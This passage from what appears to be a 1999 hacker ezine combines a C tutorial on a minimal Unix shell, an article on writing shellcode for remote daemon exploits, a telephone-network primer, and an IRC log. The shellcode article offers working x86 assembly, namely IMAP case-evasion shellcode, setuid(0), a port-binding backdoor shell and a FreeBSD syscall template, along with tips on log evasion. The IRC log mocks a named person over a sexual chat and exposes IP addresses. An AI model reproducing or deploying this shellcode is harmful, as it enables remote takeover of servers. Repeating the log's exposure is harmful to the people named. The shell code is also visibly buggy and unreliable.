  1478.  Pretty simple huh? When you run it, go ahead and execute some basic
  1479.  programs, like ls, grep, find etc. It works! Now, as I said before
  1480.  this is a very raw basic shell, and does not support wiledcards like
  1481.  '*' or '?'. Also, it doesnt support certain commands like 'cd' which
  1482.  is available in any good shell. If by some chance the wait() isnt called?
  1483.  Well, not too much of a problem, but if a user enters a command before
  1484.  the previous one is executed, the commands will execute cocurrently
  1485.  (read my article on cocurrency). Also, due to the fact that this
  1486.  first version we wrote does not find errors on the execvp() call
  1487.  it gets fucked up if you enter an invalid command. Your shell wont
  1488.  get control back from the child process and the child process creates
  1489.  its OWN shell. So you have to type 'quit' to get back to your parent 
  1490.  shell. Lets write a better version of this shell, that handles errors
  1491.  with execvp(), and we will also replace the #define'd MAX_BUF with
  1492.  MAX_CANON(located in b4b0shell.h). Because MAX_BUF is nonportable.
  1493.  
  1494.  
  1495. ----------------------------bsh v2.0-------------------------------------
  1496.  
  1497. #include "b4b0shell.h"
  1498.  
  1499. void execthecommand(char *incmd) {
  1500.     
  1501.     char **rargv;
  1502.       if(makeargv(incmd, BLANK_STRING, &rargv) > 0) {
  1503.          if(execvp(rargv[0], rargv) == -1) {
  1504.             printf("Invalid command\n");
  1505.             exit(1);
  1506.          }
  1507.         }
  1508.        exit(1);
  1509.   }
  1510. void main(void) {
  1511.  
  1512. char input[MAX_CANON];
  1513. pid_t child_pid;
  1514.  
  1515. while(1) {
  1516. fputs(PROMPT_STRING, stdout);
  1517. if (fgets(input, MAX_CANON, stdin) == NULL)
  1518.     break;
  1519. if(*(input + strlen(input) -1) == NEWLINE_SYMBOL)
  1520.   *(input + strlen(input - 1) = 0;
  1521. if(strcmp(input, QUIT_STRING) == 0)
  1522.     break;
  1523. else {
  1524.    if ((child_pid = fork()) == 0) {
  1525. execthecommand(input);
  1526. exit(1);
  1527. }
  1528.  else if(child_pid > 0)
  1529.     wait(NULL);
  1530.   }
  1531.  }
  1532.   exit(0);
  1533. }    
  1534. ------------------------------EOF-----------------------------------------
  1535.  
  1536. We made several changes to version 2 of our shell. Notice we used fputs()
  1537. instead of fprintf() for the command line. fputs() prints a defined string
  1538. alot faster. Also, notice we did some more error checking in this version.
  1539. Also notice we now have the function execthecommand() to replace the
  1540. original execvp() and makeargv calls. Control will never come back
  1541. from the function execthecommand(), so you shouldnt be having a problem
  1542. when you enter invalid commands.
  1543.  
  1544. Unix deals with input/output through file descriptors. A program has to
  1545. open a file or a device before it can access it. It will then access
  1546. the file using a handle that is returned by open() syscall. With 
  1547. the support of re-direction, you can do stuff like this.
  1548.  
  1549. b4b0$ cat < input.txt > output.txt
  1550.  
  1551. That command redirects its standard input to 'input.txt' and its output
  1552.  to 'output.txt'.
  1553.  
  1554. The following, is a revised version of execthecommand() function that you
  1555. can use to support redirection. I basically made execthecommand() parse
  1556. *incmd, which might give possible redirection. It then calls redirect()
  1557. to perform the actual redirection, and makeargv() create the command
  1558. array. It then execs the command. 
  1559.  
  1560. -----------------------------execthecommand() v2.0 by ph1x--------------------
  1561. #include "b4b0shell.h"
  1562.  
  1563. void execthecommand(char *incmd)
  1564. {
  1565.   char **rargv;
  1566.   char *infile;
  1567.   char *outfile;
  1568.  
  1569.   if(parsefile(incmd, IN_REDIRECT_SYMBOL, &infile) == -1)
  1570.     printf("Incorrect input redirection\n");
  1571.     else if
  1572.     (parsefile(incmd, OUT_REDIRECT_SYMBOL, &outfile) == -1)
  1573.     printf("Incorrect output redirection\n");
  1574.     else if
  1575.     (redirect(infile, outfile) == -1)
  1576.     printf("redirection failed!@#$\n");
  1577.     else if(makeargv(incmd, BLANK_STRING, &chargv) > 0) {
  1578.     if(execvp(rargv[0], rargv) == -1)
  1579.        printf("Invalid command\n");
  1580.     }
  1581.      exit(1);
  1582. }
  1583. --------------------------EOF---------------------------------------------
  1584.  
  1585. Change the execthecommand() in bsh v2.0 to the one I modified for 
  1586. redirection support.
  1587.  
  1588. Lets take a look at our final shell.
  1589.  
  1590. --------------------------bsh v3.0--------------------------------------
  1591.  
  1592. #include "b4b0shell.h"
  1593.  
  1594. void execthecommand(char *incmd)
  1595. {
  1596.   char **rargv;
  1597.   char *infile;
  1598.   char *outfile;
  1599.  
  1600.   if(parsefile(incmd, IN_REDIRECT_SYMBOL, &infile) == -1)
  1601.     printf("Incorrect input redirection\n");
  1602.     else if
  1603.     (parsefile(incmd, OUT_REDIRECT_SYMBOL, &outfile) == -1)
  1604.     printf("Incorrect output redirection\n");
  1605.     else if
  1606.     (redirect(infile, outfile) == -1)
  1607.     printf("redirection failed!@#$\n");
  1608.     else if(makeargv(incmd, BLANK_STRING, &chargv) > 0) {
  1609.     if(execvp(rargv[0], rargv) == -1)
  1610.        printf("Invalid command\n");
  1611.     }
  1612.      exit(1);
  1613. }
  1614.  
  1615. void main(void) {
  1616.  
  1617. char input[MAX_CANON];
  1618. pid_t child_pid;
  1619.  
  1620. while(1) {
  1621. fputs(PROMPT_STRING, stdout);
  1622. if (fgets(input, MAX_CANON, stdin) == NULL)
  1623.     break;
  1624. if(*(input + strlen(input) -1) == NEWLINE_SYMBOL)
  1625.   *(input + strlen(input - 1) = 0;
  1626. if(strcmp(input, QUIT_STRING) == 0)
  1627.     break;
  1628. else {
  1629.    if ((child_pid = fork()) == 0) {
  1630. execthecommand(input);
  1631. exit(1);
  1632. }
  1633.  else if(child_pid > 0)
  1634.     wait(NULL);
  1635.   }
  1636.  }
  1637.   exit(0);
  1638. }
  1639. ------------------------------EOF--------------------------------------
  1640.  
  1641.  
  1642. Redirection is the last feature we are going to put in our shell.
  1643. Unfortunatley, I was busy as hell getting b4b0 7 together, and I
  1644. didnt have much time to add support for pipes, background processes,
  1645. jobcontrol(allows a user to move the foreground process group into
  1646. the background, and vice versa), or most of the other things that
  1647. a good shell features. This was merely for your learning and enjoyment.
  1648. Hope you gained something out of it. Feel free to look up the functions
  1649. in b4b0shell.h that we didnt use, and extend onto your shell.
  1650.  
  1651. Bye. HEH!@#$
  1652.  
  1653. ph1x@b4b0.org
  1654.  
  1655.  
  1656. -------------------------------------------------------------------------------------
  1657. <!b4b0!b4b0!b4b0!b4b0!> The art of making shell code, by smiler. <!b4b0!b4b0!b4b0!b4b0!> 
  1658. -------------------------------------------------------------------------------------
  1659.  
  1660.  
  1661.   Hopefully you are familiar with generic shell-spawning shellcode. If not
  1662. read Aleph's text "Smashing The Stack For Fun And Profit" before
  1663. reading further. This article will concentrate on the types of shellcode
  1664. needed to exploit daemons remotely. Generally it is much harder to exploit
  1665. remote daemons, because you do not have many ways of finding out the
  1666. configuration of the remote server. Often the shellcode has to be much
  1667. more complicated, which is what this article will focus on.
  1668.  
  1669.   I will start by looking at the ancient IMAP4 exploit. This is a fairly 
  1670. simple exploit. All you need to do is "hide" the /bin/sh" string in
  1671. shellcode (imapd converts all lowercase characters into uppercase). 
  1672. None of the instructions in the generic shell-spawning shellcode contain
  1673. lower-case characters, so you all you need do is change the /bin/sh
  1674. string. 
  1675.  
  1676.   It is the same as normal shellcode, except there is a loop which adds
  1677. 0x20 to each byte in the "/bin/sh" string. I put in lots of comments so
  1678. even beginners can understand it. Sorry to all those asm virtuosos :] 
  1679.  
  1680. -----imap.S-------
  1681. .globl main
  1682. main:
  1683. jmp call
  1684. start:
  1685.  
  1686. popl %ebx /* get address of /bin/sh */
  1687. movl %ebx,%ecx  /* copy the address to ecx */
  1688. addb $0x6,%cl /* ecx now points to the last character */
  1689.  
  1690. loop:
  1691. cmpl %ebx,%ecx
  1692. jl skip     /* if (ecx<ebx) goto skip */
  1693. addb $0x20,(%ecx) /* adds 0x20 to the byte pointed to by %ecx */
  1694. decb %cl   /* move the pointer down by one */
  1695. jmp loop   
  1696. skip:
  1697.  
  1698. /* generic shell-spawning code */
  1699. movl %ebx,0x8(%ebx)
  1700. xorl %eax,%eax
  1701. movb %eax,0x7(%ebx)
  1702. movl %eax,0xc(%ebx)
  1703. movb $0xb,%al
  1704. leal 0x8(%ebx),%ecx
  1705. leal 0xc(%ebx),%edx
  1706. int $0x80
  1707. xorl %eax,%eax
  1708. inc %al
  1709. int $0x80
  1710. call:
  1711. call start
  1712. .string "\x0f\x42\x49\x4e\x0f\x53\x48"
  1713. --------------
  1714.  
  1715.   This was a very simple variation on the generic shellcode and can be
  1716. useful to mask characters that aren't allowed by the protocol the daemon
  1717. uses. But when coding remote, or even local, exploits you have to be
  1718. prepared to write code which is much more complex. This usually means
  1719. writing shellcode that involves different syscalls. 
  1720. Useful syscalls are:
  1721.  
  1722. setuid(): To regain dropped root priviledges (e.g. wu-ftpd)
  1723. mkdir()/chdir()/chroot(): To drop back to root directory (e.g. wu-ftpd)
  1724. dup2(): To connect a tcp socket to the shell (e.g. BIND&rpc.mountd tcp-style )
  1725. open()/write(): To write to /etc/passwd (e.g. everything !)
  1726. socket(): To write connectionless shellcode, as explained later.
  1727.  
  1728. The actual syscall numbers can be found in <asm/unistd.h>
  1729.  
  1730.   Most syscalls in linux x86 are done in the same way. The syscall number
  1731. is put into register %eax, and the arguments are put into %ebx,%ecx and
  1732. %edx respectively. In some cases, where there are more arguments than
  1733. registers  it may be necessary to store the arguments in user memory and
  1734. store the address of the arguments in the register. Or, if an argument
  1735. is a string, you would have to store the string in user memory and pass
  1736. the address of string as the argument.  As before, the syscall is called
  1737. by "int $0x80". 
  1738.   You can potentially use any syscall, but the ones mentioned above should
  1739. just about be the only ones you will ever need.
  1740.  
  1741.   As an example heres a little shellcode snippet from my wu-ftpd exploit
  1742. that should execute setuid(0).
  1743.  
  1744. Note: you should always zero a register before using it.
  1745.  
  1746. ---setuid.S----
  1747. .globl main
  1748. main:
  1749. xorl %ebx,%ebx /* zero the %ebx register, i.e. the 1st argument */
  1750. movl %ebx,%eax /* zero out the %eax register */
  1751. movb $0x17,%al /* set the syscall number */
  1752. int $0x80 /* call the interrupt handler */
  1753. ---------------
  1754.  
  1755.  
  1756. Port-Binding Shellcode
  1757.  
  1758.   When you are exploiting a daemon remotely with generic shellcode, it is
  1759. necessary to have an active TCP connection to pipe the shell stdin/out/err
  1760. over. This is applicable to all the remote linux exploits I've seen so
  1761. far, and is the preferred method. 
  1762.  
  1763.   But it is possible that a new vulnerability may be found, in a daemon
  1764. that only offers a UDP service (SNMP for example).  Or it may only be
  1765. possible to access the daemon via UDP because the TCP ports are
  1766. firewalled etc. Current linux remote vulnerabilites are exploitable
  1767. via UDP - BIND as well as all rpc services run both UDP and TCP
  1768. services. Also, if you send the exploit via UDP it is trivial to spoof the
  1769. attacking udp packet so that you do not appear in any logs =) 
  1770.   
  1771.   To exploit daemons via UDP you could write shellcode to modify the
  1772. password file or to perform some other cunning task, but an interactive
  1773. shell is much more elite =] Clearly it is not possible to fit a UDP pipe
  1774. into shellcode, you still need a TCP connection. So my idea was to write
  1775. shellcode that behaved like a very rudimentary backdoor, it binds to a
  1776. port and executes a shell when it receives a connection. 
  1777.  
  1778.   I know for a fact that I wasn't the first one to write this type of 
  1779. shellcode, but no one has officially published it so...here goes. 
  1780.  
  1781. A basic bindshell program(without the style) looks like this:
  1782.  
  1783. int main()
  1784. {
  1785.     char *name[2];
  1786.     int fd,fd2,fromlen;
  1787.     struct sockaddr_in serv;
  1788.  
  1789.     fd=socket(AF_INET,SOCK_STREAM,0);
  1790.     serv.sin_addr.s_addr=0;
  1791.     serv.sin_port=1234;
  1792.     serv.sin_family=AF_INET;
  1793.     bind(fd,(struct sockaddr *)&serv,16);
  1794.     listen(fd,1);
  1795.     fromlen=16; /*(sizeof(struct sockaddr)*/
  1796.     fd2=accept(fd,(struct sockaddr *)&serv,&fromlen);
  1797.     /* "connect" fd2 to stdin,stdout,stderr */
  1798.     dup2(fd2,0);
  1799.     dup2(fd2,1);
  1800.     dup2(fd2,2);
  1801.     name[0]="/bin/sh";
  1802.     name[1]=NULL;
  1803.     execve(name[0],name,NULL);
  1804. }
  1805.  
  1806.   Obviously, this is going to require a lot more space than normal 
  1807. shellcode, but it can be done in under 200 bytes and most buffers are 
  1808. quite a bit larger than that.
  1809.  
  1810.   There is a slight complication in writing this shellcode as socket
  1811. syscalls are done slightly differently than other syscalls, under linux.
  1812. Every socket call has the same syscall number, 0x66. To differentiate
  1813. between different socket calls, a subcode is put into the register %ebx.
  1814. These can be found in <linux/net.h>. The important ones being:
  1815.  
  1816. SYS_SOCKET   1
  1817. SYS_BIND     2
  1818. SYS_LISTEN   4
  1819. SYS_ACCEPT   5
  1820.  
  1821.   We also need to know the values of the constants, and the exact
  1822. structure of sockaddr_in. Again these are in the linux include files.
  1823.  
  1824. AF_INET == 2
  1825. SOCK_STREAM == 1
  1826.  
  1827. struct sockaddr_in {
  1828.   short int sin_family; /* 2 byte word, containing AF_INET */
  1829.   unsigned short int sin_port; /* 2 byte word, containg the port in network byte order */ 
  1830.   struct in_addr sin_addr /* 4 byte long, should be zeroed */
  1831.   unsigned char pad[8]; /* should be zero, but doesn't really matter */
  1832. };
  1833.  
  1834.   Since there are only two registers left, the arguments must be placed
  1835. sequentially in user memory, and %ecx must contain the address of the
  1836. first. Hence we have to store the arguments at the end of the shellcode.
  1837. The first 12 bytes will contain the 3 long arguments, the next 16 will
  1838. contain the sockaddr_in structure and the final 4 will contain fromlen
  1839. for the accept() call. Finally the result from each syscall is held in
  1840. %eax.
  1841.  
  1842. So, without further ado, here is the portshell warez...
  1843.  
  1844. Again I've over-commented everything.
  1845.  
  1846. ----portshell.S----
  1847. .globl main
  1848. main:
  1849.  
  1850. /* I had to put in a "bounce" in the middle of the code as the shellcode
  1851.  * was too big. If I had made it jmp the entire shellcode, the instruction
  1852.  * would have contained a null byte, so if anyone has a shorter version,
  1853.  * please send me it.
  1854.  */
  1855.  
  1856. jmp bounce
  1857. start:
  1858. popl %esi
  1859.  
  1860. /* socket(2,1,0) */
  1861. xorl %eax,%eax
  1862. movl %eax,0x8(%esi)  /* 3rd arg == 0 */
  1863. movl %eax,0xc(%esi)  /* zero out sock.sin_family&sock.sin_port */
  1864. movl %eax,0x10(%esi) /* zero out sock.sin_addr */
  1865. incb %al
  1866. movl %eax,%ebx       /* socket() subcode == 1 */
  1867. movl %eax,0x4(%esi)  /* 2nd arg == 1 */
  1868. incb %al
  1869. movl %eax,(%esi)     /* 1st arg == 2 */
  1870. movw %eax,0xc(%esi)  /* sock.sin_family == 2 */
  1871. leal (%esi),%ecx     /* load the address of the arguments into %ecx */
  1872. movb $0x66,%al       /* set socket syscall number */
  1873. int $0x80
  1874.  
  1875. /* bind(fd,&sock,0x10) */
  1876. incb %bl             /* bind() subcode == 2 */
  1877. movb %al,(%esi)      /* 1st arg == fd (result from socket()) */
  1878. movl %ecx,0x4(%esi)  /* copy address of arguments into 2nd arg */
  1879. addb $0xc,0x4(%esi)  /* increase it by 12 bytes to point to sockaddr struct */
  1880. movb $0x10,0x8(%esi) /* 3rd arg == 0x10 */
  1881. movb $0x23,0xe(%esi) /* set sin.port */
  1882. movb $0x66,%al       /* no need to set %ecx, it is already set */
  1883. int $0x80 
  1884.  
  1885. /* listen(fd,2) */
  1886. movl %ebx,0x4(%esi) /* bind() subcode==2, move this to the 2nd arg */
  1887. incb %bl            /* no need to set 1st arg, it is the same as bind() */
  1888. incb %bl            /* listen() subcode == 4 */
  1889. movb $0x66,%al      /* again, %ecx is already set */
  1890. int $0x80
  1891.  
  1892. /* fd2=accept(fd,&sock,&fromlen) */
  1893. incb %bl            /* accept() subcode == 5 */
  1894. movl %ecx,0x4(%esi) /* copy address of arguments into 2nd arg */
  1895. addb $0xc,0x4(%esi) /* increase it by 12 bytes */
  1896. movl %ecx,0x4(%esi) /* copy address of arguments into 3rd arg */
  1897. addb $0x1c,0x4(%esi) /* increase it by 12+16 bytes */
  1898. movb $0x66,%al
  1899. int $0x80
  1900.  
  1901. /* KLUDGE */
  1902. jmp skippy
  1903. bounce:
  1904. jmp call
  1905. skippy:
  1906.  
  1907. /* dup2(fd2,0) dup2(fd2,1) dup2(fd2,2) */
  1908. movb %al,%bl /* move fd2 to 1st arg */
  1909. xorl %ecx,%ecx /* 2nd arg is 0 */
  1910. movb $0x3f,%al /* set dup2() syscall number */
  1911. int $0x80
  1912. incb %cl       /* 2nd arg is 1 */
  1913. movb $0x3f,%al
  1914. int $0x80
  1915. incb %cl       /* 2nd arg is 2 */
  1916. movb $0x3f,%al
  1917. int $0x80
  1918.  
  1919. /* execve("/bin/sh",["/bin/sh"],NULL) */
  1920. movl %esi,%ebx
  1921. addb $0x20,%ebx /* %ebx now points to "/bin/sh" */
  1922. xorl %eax,%eax
  1923. movl %ebx,0x8(%ebx)
  1924. movb %al,0x7(%ebx)
  1925. movl %eax,0xc(%ebx)
  1926. movb $0xb,%al
  1927. leal 0x8(%ebx),%ecx
  1928. leal 0xc(%ebx),%edx
  1929. int $0x80
  1930. /* exit(0) */
  1931. xorl %eax,%eax
  1932. movl %eax,%ebx 
  1933. incb %al
  1934. int $0x80
  1935. call:
  1936. call start
  1937. .ascii "abcdabcdabcd""abcdefghabcdefgh""abcd""/bin/sh"
  1938. -----------------------------------------------------
  1939.  
  1940. Once you have sent the exploit, you only need to connect to port 8960, and
  1941. you have an interactive shell.
  1942.  
  1943. ----------------[ FreeBSD shellcode
  1944.  
  1945.   Just in case all of that was all old hat to you, I'll take a little
  1946. foray into the world of BSD x86 shellcode. FreeBSD shellcode is in most
  1947. ways completely different. Primarily because syscalls are done by pushing 
  1948. arguments onto the stack and using a far call. The syscall number 
  1949. still goes in the %eax register however. OpenBSD is much the same but 
  1950. it uses an interrupt for syscalls. 
  1951.  
  1952.   The main complication in writing shellcode for FreeBSD is in the far
  1953. call (instruction lcall 7,0) which contains 5 null bytes. Obviously
  1954. you would need to write some basic self-modifying shellcode. Since this is
  1955. going to be used in every syscall you make, its best to put this into a
  1956. mini-function and call it whenever necessary. I wrote a little template
  1957. for this, it's easy enough to make it execute a shell or bind to a port.
  1958. Just incase you're wondering the syscall for execve is 0x3b.
  1959.  
  1960. ----fbsd.S----
  1961. .globl main
  1962. main:
  1963. jmp call
  1964. start:
  1965. /* Modify the ascii string so it becomes lcall 7,0 */
  1966. popl %esi
  1967. xorl %ebx,%ebx
  1968. movl %ebx,0x1(%esi) /* zeroed long word */
  1969. movb %bl,0x6(%esi)  /* zeroed byte */
  1970. movl %esi,%ebx
  1971. addb $0x8,%bl /* ebx points to binsh */
  1972. jmp blah /* start the code */
  1973.  
  1974. call:
  1975. call start
  1976. syscall:
  1977. .ascii "\x9a\x01\x01\x01\x01\x07\x01" /* hidden lcall 7,0 */
  1978. ret
  1979. binsh:
  1980. .ascii "/bin/sh...."
  1981. blah:
  1982. /* put shellcode here */
  1983. call syscall 
  1984.  
  1985.  
  1986. ================================================================================
  1987.                 [The Telephone System/network part 1]
  1988. ================================================================================
  1989.  
  1990. By - Pabell
  1991.  
  1992. THE TELEPHONE SYSTEM OR NETWORK
  1993.  
  1994. This paper was written mainly because of the lack of real information 
  1995. kicking around on and off the net about phone systems and networks. 
  1996. This is part one, of a two-part primer on phone systems. This is a 
  1997. very introductory paper. I don't go into great detail, but cover the 
  1998. basics and a first look at phone networks and systems.
  1999.  
  2000. If you really haven't been exposed to the telephony industry, this 
  2001. paper, may be ominous. For the purpose of this paper I have broken 
  2002. the telephone network into three basic components.
  2003.  
  2004. 1. THE CENTRAL SWITCHING MACHINE
  2005. 2. THE OUTSIDE PLANT FACILITIES
  2006. 3. THE INSIDE PLANT FACILITIES
  2007.  
  2008. In this paper we will look at each of the three sections.  
  2009. Section three the INSIDE PLANT FACILITIES will be covered in detail 
  2010. throughout it.  The CENTRAL SWITCHING MACHINE and the OUTSIDE PLANT 
  2011. FACILITIES sections of the telephone network will be explained briefly
  2012. in general terms. Most of the parts of the telephone system or network 
  2013. will already be familiar to you even without realizing it.  You have a 
  2014. phone of some description in your home or office, which is part of 
  2015. the INSIDE PLANT FACILITIES section of the telephone network.
  2016.  
  2017. The INSIDE PLANT FACILITIES consists of all the cable, hardware, 
  2018. telephone sets or equipment in the building or between buildings on 
  2019. the same piece of property. The part of the network, which connects 
  2020. buildings of various shapes and descriptions together, is called THE
  2021. OUTSIDE PLANT FACILITIES.  Poles and associated wires are the only 
  2022. type of outside plant distribution system in use today.
  2023.  
  2024. The remaining part you may not know about, or at least think you don't
  2025. know about, is the Central Switching Machine. The basic telephone circuit
  2026.  is Two Wire Circuit, which connects every telephone set, through the 
  2027. Outside Plant Facilities to a Central Switch.  This two-wire circuit is
  2028.  usually referred to as a "pair".  One wire of the pair is referred to
  2029.  as the TIP and the other wire is the RING.
  2030.  
  2031.  
  2032. THE CENTRAL SWITCHING MACHINE
  2033.  
  2034. The CENTRAL SWITCHING MACHINE is similar to the hub of a wheel where all
  2035.  the individual two wire circuits or spokes are connected. This may sound
  2036.  pretty complicated, but it really isn't.  The central switch monitors
  2037.  your telephone circuit and gives you a dial tone when you lift the 
  2038. telephone set off the cradle.  Taking a telephone handset off the 
  2039. cradle is referred to as going "off-hook". Off-hook is a very common
  2040.  phrase, and you will hear it in later parts of this paper.
  2041.  
  2042. When you dial, the Central Switch registers the digits dialed,
  2043.  and identifies the circuit of the party you are trying to reach.  The 
  2044. Central Switch then connects your two-wire circuit to the party you dialed.  The two telephone sets, which are connected together by the Central Switch, are referred to as the "calling" and "called" parties.  The Central Switch the sends a ringing voltage
  2045.  
  2046.  
  2047.  out to the called party, which rings the set bells to identify an incoming call.
  2048.  
  2049. When the called party goes off-hook, the Central Switch recognizes the
  2050.  off-hook condition, and stops sending the ringing voltage, the two 
  2051. parties then converse. When the calling party dials a number of a 
  2052. telephone circuit which is already in use, or "busy", the Central 
  2053. Switch recognizes the busy condition, and returns a busy tone to
  2054. the calling party.
  2055.  
  2056. So, as you can see, the Central Switch isn't really unfamiliar to you.
  2057. You have interacted with, and experienced many of the operations it
  2058. performs. There are many types of Central Switching Machines in use
  2059. throughout the telephone industry today.  Each switch has it's advantages,
  2060. and features, however all systems provide the basic functions which were 
  2061. briefly described.
  2062.  
  2063. To review, the main parts of the Telephone Network I have described so 
  2064. far are:
  2065.  
  2066. 1. THE CENTRAL SWITCHING MACHINE
  2067. 2. THE OUTSIDE PLANT FACILITIES
  2068. 3. THE INSIDE PLANT FACILITIES
  2069.  
  2070.  
  2071. Let's backtrack briefly to the Outside Plant Facilities section of the
  2072. network.  Obviously, it would be too difficult to take each seperate
  2073. two-wire circuit, individually back to the Central Switch.  Consequently,
  2074. numerous two wire circuits or pairs from a common area are bound together
  2075. in a common covering, or sheath.  These groups of pairs enclosed by a common
  2076. sheath are referred to as cable. The actual number of pairs in a cable
  2077. or the size of cable can vary from one pair, to hundreds of pairs dependent
  2078. upon how many circuits the cable must service. As was mentioned previously,
  2079.  all the cables servicing locations leave the Central Switch in different 
  2080. directions according to the route, which will be the most cost effective,
  2081.  and can effectively, service people in the area.  The cables, which leave
  2082.  the Central Switch, are very large, but as the cable goes along it is 
  2083. continually decreasing in size, as smaller cables are dropped off at 
  2084. locations where they are needed.  The smaller cables branch out from the 
  2085. main cables, and these cables again branch out to smaller cables until
  2086.  every building and place is reached.
  2087.  
  2088.  
  2089. There are three basic types of outside plant facilities in use today, which connect the Central Switch, ultimately to your phone.
  2090.  
  2091. 1. AERIAL CABLE
  2092. 2. UNDERGROUND CABLE
  2093. 3. FIBER OPTIC CABLE
  2094.  
  2095.  
  2096.  
  2097. Let's briefly look at each of the types of Outside Plant Facilities.
  2098.  
  2099.  
  2100. Aerial Cable
  2101.  
  2102. As the name aerial cable would indicate, the cable, and terminals are
  2103.  supported above the ground on poles.  The Aerial Cable distribution 
  2104. system is probably the one you are most familiar with, since it was the 
  2105. first system utilized across North America.  The poles and wire are still
  2106.  visible throughout this country today, and in many cases, is still the 
  2107. most cost-effective method, where underground cabling is physically 
  2108. impossible.
  2109.  
  2110. The diagram would be typical of a single line residential building
  2111. application of an Aerial Outside Plant System.  You may see the term 
  2112. "terminal" in the diagram.  Terminals are simply access points placed at
  2113. convenient locations, on or between poles, along the cable route to permit
  2114. connections to selected pairs in the cable.  For example, a cable 
  2115. consisting of 100 pairs might have a terminal mounted on the pole to 
  2116. allow a technician access to pairs 1-25.  The next terminal would allow
  2117. access to pairs 24-40, and so on, until all the pairs have been used.
  2118.  
  2119. In this manner, the pair assigned to each building, at the Central Switch,
  2120. can be accessed at the closest terminal to that particular building.  
  2121. The individual buildings aerial "drop wire" is then connected to the 
  2122. pair in that terminal.
  2123.  
  2124. Underground Cable
  2125.  
  2126. The underground cable distribution system is very similar in design to the
  2127. aerial cable system.  I consider underground cable to be both, DIRECT 
  2128. BURIED CABLE and CABLE PLACED IN UNDERGROUND CONDUIT SYSTEMS. 
  2129. As the title Direct Buried would indicate, the cable is placed into
  2130. the ground, with no protection other than the inherent protection
  2131. provided by the cable composition.  Underground Conduit Systems
  2132. for cable, are used to provide an out of sight cable system and to
  2133. provide a means of adding to the existing cable as service demands
  2134. increase.  Underground Conduit Systems also provide protection for
  2135. the cables since the cables are inside a pipe, which shields the cable.  
  2136. The Underground Cable Distribution System is configured similarly to
  2137.  the aerial cable, in that, cables leave a central point and continually 
  2138. branch out to smaller cables until all the buildings etc. have been 
  2139. accommodated.  
  2140.  
  2141. The Underground System is connected to buildings in basically two ways.
  2142. PEDESTALS and ENCAPSULATION.  Pedestals are simply terminals or access
  2143. points where building cabling can be connected to the cable from the 
  2144. Central Switching Machine.  There are many types, sizes, and shapes of 
  2145. pedestals in use today.
  2146.  
  2147. The following diagram is a simplified depiction of the underground cable
  2148. (drop wire) from a building premise, which has been buried, to a pedestal
  2149. for connection.
  2150.  
  2151.  
  2152. Encapsulation is when the buildings drop wire is permanently spliced into
  2153. the underground distribution system.  This system is preferred in 
  2154. situations where the visible pedestals are not appropriate, or possible.
  2155.  
  2156.  
  2157. Fiber Optic Transmission Systems
  2158.  
  2159. In the aerial and underground cable distribution systems looked at 
  2160. earlier, a pair of copper wires is used to carry the electrical signals
  2161. generated by the transmitting buildings phone, to the switching machine,
  2162. and then ultimately, to the receivers phone.  The mouthpiece (transmitter)
  2163. of the telephone converts the acoustic voice message into corresponding
  2164. electrical signals.  The electrical signals are passed onto the receiver's
  2165. earpiece (receiver) where they are converted back to the original 
  2166. acoustic voice message.
  2167.  
  2168.  
  2169. In certain cases now, it is becoming uneconomical to provide a pair of 
  2170. wires from every customer phone to the central switch.  Transmitting speech
  2171.  and information via glass fibers instead of the conventional copper wire 
  2172. methods previously described is becoming increasingly popular in high 
  2173. traffic areas.  The term "Fiber Optics" or "FOTS" is becoming more and 
  2174. more prevalent in the communication industry.  "FOTS" is the short term 
  2175. for Fiber Optics Transmission System.
  2176. The development of FOTS technology has been increasing dramatically in 
  2177. recent years.  The transmitting buildings phone still generates the same 
  2178. electrical signals, but the signals are used to turn a light source on and
  2179.  off.  The light travels down the glass fibers where it is received and 
  2180. converted back to electrical impulses, which are connected to the 
  2181. receiving customers to wire copper pair.
  2182.  
  2183.  
  2184. To get a perspective of the comparison of a pair of copper wires to a pair
  2185.  of glass fibers, consider the number of independent connections, which are
  2186.  possible on each type of system.
  2187.  
  2188. * A pair of copper wires will provide two way communications for one conversation.
  2189. * A pair of glass fibers can provide up to 8000 independent connections.
  2190.  
  2191. The demands for more and more facilities to transmit and receive
  2192. information is increasingly rapid.  The cost and limitations of 
  2193. traditional means of linking areas together, is becoming more apparent.
  2194. The normal cable distribution systems in use throughout the telephone 
  2195. industry employs combinations of underground, aerial, and FOTS 
  2196. distribution systems, to provide the most cost efficient, and effective
  2197. means of providing service.  
  2198.  
  2199.  
  2200. There is your basic introduction to the telephone network or system. 
  2201. As my series of phone networks goes on I will go into greater detail
  2202. and explain some of its more complex issues and attributes.
  2203.  
  2204. Pabell
  2205.  
  2206. pabell@comtech.ab.ca
  2207.  
  2208. -------------------------------------------------------------------------------------------
  2209. <!b4b0!b4b0!b4b0!b4b0!> el8 wu-ftpd overflow, by cossack and smiler <!b4b0!b4b0!b4b0!b4b0!
  2210. -------------------------------------------------------------------------------------------
  2211.  
  2212. Check out /wu-ftpd/w00f.c
  2213.  
  2214. Also, check out /wu-ftpd/fscan.c for remote wu-ftpd buffer overflow scanner.
  2215. Scans for versions 12-18. Ph1x@b4b0.org.
  2216.  
  2217. -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x-
  2218.                           [IRC LOGZ!@#$]
  2219. -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- 
  2220.  
  2221.  (kur4ck getting hiz sh33t on w1th muh w0men)
  2222.  
  2223.  NOTE: He is actually whacking off during this session of cybersex on IRC.
  2224.  
  2225.  
  2226. IRC log started Tue Feb 23 15:18:14 1999
  2227. [asphxia(bg0124a@216.76.138.90)] 2640 country trace
  2228. [asphxia(bg0124a@216.76.138.90)] conyers ga
  2229. [asphxia(bg0124a@216.76.138.90)] 30013
  2230. [asphxia(bg0124a@216.76.138.90)] ok
  2231. [asphxia(bg0124a@216.76.138.90)] bree
  2232. [msg(asphixa)] HE hill mail u 5$s HEHim loaded
  2233. [rachel_(nobans@166-87-97.ipt.aol.com)] hahahaha
  2234. [msg(asphixia)] HE hill mail u 5$s HEHim loaded
  2235. <rachel_> ok
  2236. <rachel_> back
  2237. <rachel_> chrak
  2238. <rachel_> he loves the simpsons too
  2239. <rachel_> :\
  2240. [msg(asphxia)] im loaded HEH ill send u a 54 bill
  2241. [msg(rachel_)]  HEH for 5$ she will cybersex me
  2242. [msg(rachel_)]  im gonna log it
  2243. <rachel_> so youre more like him than u thought
  2244. <rachel_> :\
  2245. [msg(rachel_)] and
  2246. [msg(rachel_)] let gummo see it HEH!!
